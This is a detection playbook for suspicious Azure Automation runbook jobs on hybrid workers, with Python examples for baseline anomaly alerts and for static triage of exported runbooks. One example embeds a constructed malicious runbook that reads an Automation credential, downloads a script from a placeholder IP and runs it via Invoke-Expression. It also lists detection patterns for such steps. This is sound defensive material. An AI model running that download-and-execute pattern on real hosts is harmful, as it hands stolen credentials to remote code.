Azure Suspicious Hybrid Automation Execution

Detection overview

Triggers

  • Unusual execution of an Azure Automation Runbook on a hybrid machine (a Hybrid Runbook Worker) by an unexpected or unauthorized user or service principal.
  • Unusual changes to Runbook execution permissions, for example a new role assignment on the Automation Account or on one of its parent scopes (resource group or subscription).
  • Runbooks being executed (or newly deployed) on hybrid machines for a legitimate business use case that the established baseline has not seen before.
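As an added example (not code from the page or from the vendor of this detection), the first two triggers above written out as checks over constructed data: a baseline of hybrid job records is built, new jobs are flagged when the caller or the runbook/worker-group pairing is new, and Activity Log role-assignment events are flagged when their scope covers the Automation Account. The job fields loosely follow the AzureDiagnostics JobLogs columns (Caller, RunbookName_s, RunOn_s, ResultType); the field names, the account resource id and every sample row are assumptions made for this example.

```python
"""Trigger logic for 'suspicious hybrid automation execution' over constructed records.

Added example; field names, ids and sample rows are assumptions, not real telemetry.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class JobRecord:
    time: str
    caller: str   # UPN of the user, or name/object id of the service principal
    runbook: str
    run_on: str   # Hybrid Runbook Worker group name; "" means the Azure sandbox
    result: str   # Completed / Failed / Suspended


# Constructed history: a service principal runs two maintenance runbooks on two
# worker groups, an operator occasionally runs one of them and one sandbox job.
BASELINE_JOBS = [
    JobRecord("2024-05-01T02:00Z", "sp-ops-automation", "Restart-AppService", "hw-dc-west", "Completed"),
    JobRecord("2024-05-02T02:00Z", "sp-ops-automation", "Restart-AppService", "hw-dc-west", "Completed"),
    JobRecord("2024-05-03T02:00Z", "sp-ops-automation", "Rotate-LocalLogs", "hw-dc-east", "Completed"),
    JobRecord("2024-05-04T09:12Z", "alice@example.com", "Rotate-LocalLogs", "hw-dc-east", "Completed"),
    JobRecord("2024-05-06T10:30Z", "alice@example.com", "Collect-Diagnostics", "", "Completed"),
]

# Constructed new jobs to evaluate against that baseline.
NEW_JOBS = [
    JobRecord("2024-06-01T02:00Z", "sp-ops-automation", "Restart-AppService", "hw-dc-west", "Completed"),  # normal
    JobRecord("2024-06-01T03:41Z", "bob@example.com", "Restart-AppService", "hw-dc-west", "Completed"),    # new caller
    JobRecord("2024-06-01T03:44Z", "bob@example.com", "Collect-Diagnostics", "hw-dc-east", "Completed"),   # sandbox-only runbook now on a worker
    JobRecord("2024-06-01T03:50Z", "bob@example.com", "Collect-Diagnostics", "", "Completed"),             # sandbox job: out of scope
]


def build_baseline(records):
    """Map (runbook, worker group) -> set of callers seen running it on that group."""
    seen = defaultdict(set)
    for r in records:
        if r.run_on:
            seen[(r.runbook, r.run_on)].add(r.caller)
    return seen


def flag_unusual_hybrid_jobs(baseline, records):
    """Trigger 1: hybrid execution by a caller, or of a runbook/group pairing, not in the baseline."""
    alerts = []
    for r in records:
        if not r.run_on:
            continue  # sandbox jobs never touch a hybrid machine
        key = (r.runbook, r.run_on)
        if key not in baseline:
            alerts.append((r, "runbook has never run on this hybrid worker group"))
        elif r.caller not in baseline[key]:
            alerts.append((r, "caller has never run this runbook on this group"))
    return alerts


# Constructed, simplified Activity Log entries (ids are placeholders).
AUTOMATION_ACCOUNT = "/subscriptions/0000/resourceGroups/rg-ops/providers/Microsoft.Automation/automationAccounts/aa-ops"
ACTIVITY_EVENTS = [
    {"operationName": "Microsoft.Automation/automationAccounts/jobs/write", "caller": "bob@example.com",
     "resourceId": AUTOMATION_ACCOUNT + "/jobs/1234"},
    {"operationName": "Microsoft.Authorization/roleAssignments/write", "caller": "bob@example.com",
     "resourceId": AUTOMATION_ACCOUNT + "/providers/Microsoft.Authorization/roleAssignments/abcd"},
    {"operationName": "Microsoft.Authorization/roleAssignments/write", "caller": "bob@example.com",
     "resourceId": "/subscriptions/0000/providers/Microsoft.Authorization/roleAssignments/ijkl"},
    {"operationName": "Microsoft.Authorization/roleAssignments/write", "caller": "alice@example.com",
     "resourceId": "/subscriptions/0000/resourceGroups/rg-web/providers/Microsoft.Web/sites/web1"
                   "/providers/Microsoft.Authorization/roleAssignments/efgh"},
]
ROLE_OPS = {"Microsoft.Authorization/roleAssignments/write", "Microsoft.Authorization/roleAssignments/delete"}


def assignment_scope(resource_id):
    """Scope a role assignment applies to: everything before the roleAssignments segment."""
    marker = "/providers/microsoft.authorization/roleassignments"
    rid = resource_id.lower()
    return rid.split(marker, 1)[0] if marker in rid else None


def flag_permission_changes(events, account_id):
    """Trigger 2: role assignments at, below, or above the Automation Account.

    A parent-scope assignment (resource group, subscription) also changes who can
    run the account's runbooks, so it is matched as well.
    """
    acct = account_id.lower()
    hits = []
    for e in events:
        if e["operationName"] not in ROLE_OPS:
            continue
        scope = assignment_scope(e["resourceId"])
        if scope and (acct.startswith(scope) or scope.startswith(acct)):
            hits.append(e)
    return hits


if __name__ == "__main__":
    baseline = build_baseline(BASELINE_JOBS)
    for job, reason in flag_unusual_hybrid_jobs(baseline, NEW_JOBS):
        print(f"{job.time} {job.caller} ran {job.runbook} on {job.run_on}: {reason}")
    for e in flag_permission_changes(ACTIVITY_EVENTS, AUTOMATION_ACCOUNT):
        print(f"role assignment change by {e['caller']} at scope {assignment_scope(e['resourceId'])}")
```

Against this data the sandbox job is ignored, bob's first run of an established runbook and the first-ever hybrid run of Collect-Diagnostics are both flagged, and two of the three role-assignment writes (account scope and subscription scope) are reported while the unrelated web-app assignment is not.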

Possible Root Causes

  • A compromised principal account is attempting to execute malicious Runbooks.
  • An administrator or developer has inadvertently created or modified a Runbook with unusual logic.
  • Automated deployment scripts are updating Runbooks without proper authorization.
  • A legitimate business process involves running Runbooks, but the execution frequency or parameters have been altered.

Business Impact

  • Exposure of sensitive data due to unauthorized access or data leaks.
  • Exploitation of misconfigured VMs, Runbooks or hybrid environments; because a hybrid job runs on the worker machine itself, a malicious Runbook amounts to code execution on that on-premises or multi-cloud host.
  • Disruption of critical business services and reputational damage due to unplanned system downtime.
  • Unauthorized changes to business logic or workflows, leading to financial losses or compliance issues.

Steps to Verify

  • Review Azure Activity Logs for the suspicious event, focusing on the user/service principal that created the job and the hybrid Runbook it executed. The Activity Log only records the control-plane job creation (operation Microsoft.Automation/automationAccounts/jobs/write); the job's own output and error streams are available from the Automation Account's job history or, if diagnostic settings are enabled, from the JobLogs and JobStreams categories in Log Analytics.
  • Investigate the user's or service principal's permissions and access levels within Azure, including role assignments inherited from the resource group or subscription.
  • Verify whether other security alerts or notifications were triggered around the time of the suspicious event.
  • Inspect the Runbook code for signs of malicious activity. To view the Runbook:
    - Navigate to the 'Automation Accounts' service in Azure
    - Identify the Automation Account associated with the Runbook
    - The Runbooks can be found under 'Process Automation' for the selected Automation Account
  • Consult with Azure administrators, security teams, and relevant stakeholders to determine the cause and scope of the incident.
  • If the review indicates malicious actions, isolate the Hybrid Runbook Worker group (or the individual member workers) for further investigation and remediate: unpublish or disable the Runbook, revoke the principal's access, and rotate any Automation credentials, connections or certificates the Runbook could read.
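As an added example for the "inspect the Runbook code" step (not code from the page or from the vendor of this detection), a first-pass static triage of an exported PowerShell runbook. Both runbook bodies are constructed for this example, and the indicator list is an assumption about what a reviewer checks first rather than a complete signature set; a clean result does not prove a Runbook benign, it only tells you where to read closely.

```python
"""Static triage of an exported Azure Automation runbook for common red flags.

Added example; the runbook texts and indicator list are constructed assumptions.
"""
import re

# Constructed: what a tampered hybrid runbook might look like after export.
SUSPICIOUS_RUNBOOK = r"""
param([string]$Target)
$cred = Get-AutomationPSCredential -Name 'DomainAdmin'
$wc = New-Object System.Net.WebClient
$payload = $wc.DownloadString('http://203.0.113.7/stage.ps1')
Invoke-Expression $payload
Start-Process powershell.exe -ArgumentList '-NoProfile', '-EncodedCommand', $blob
""".strip()

# Constructed: an ordinary maintenance runbook for the same worker group.
BENIGN_RUNBOOK = r'''
param([string]$ServiceName)
Restart-Service -Name $ServiceName
Write-Output "Restarted $ServiceName on $env:COMPUTERNAME"
'''.strip()

# (label, pattern). A hybrid job executes on the worker host itself, so code
# that is fetched or decoded at run time is the first thing to look at.
INDICATORS = [
    ("fetches remote content",
     re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I)),
    ("executes dynamic code",
     re.compile(r"Invoke-Expression|\biex\b|-EncodedCommand|-enc\b", re.I)),
    ("reads Automation credentials",
     re.compile(r"Get-Automation(PSCredential|Connection|Certificate)", re.I)),
    ("changes local accounts or persistence",
     re.compile(r"New-LocalUser|Add-LocalGroupMember|\bnet\s+user\b|schtasks|New-ScheduledTask", re.I)),
    ("hard-coded IP address URL",
     re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}", re.I)),
]


def scan_runbook(source):
    """Return (line number, label, line text) for every indicator hit, in file order."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for label, pattern in INDICATORS:
            if pattern.search(line):
                findings.append((lineno, label, line.strip()))
    return findings


def summarize(findings):
    """Severity plus the distinct labels hit.

    Credential access combined with remote or dynamic code is rated high: the
    runbook can read Automation assets and hand them to code it did not ship with.
    """
    labels = {label for _, label, _ in findings}
    if "reads Automation credentials" in labels and (
            "fetches remote content" in labels or "executes dynamic code" in labels):
        severity = "high"
    elif labels:
        severity = "medium"
    else:
        severity = "none"
    return severity, sorted(labels)


if __name__ == "__main__":
    for name, body in (("suspicious", SUSPICIOUS_RUNBOOK), ("benign", BENIGN_RUNBOOK)):
        findings = scan_runbook(body)
        severity, labels = summarize(findings)
        print(f"{name}: severity={severity} labels={labels}")
        for lineno, label, text in findings:
            print(f"  line {lineno}: {label}: {text}")
```

Run it against a runbook exported from the Automation Account and read every flagged line in context; then compare the published content with what source control holds, if source control integration is in use, since an attacker who edits and re-publishes an existing Runbook leaves no new Runbook to notice.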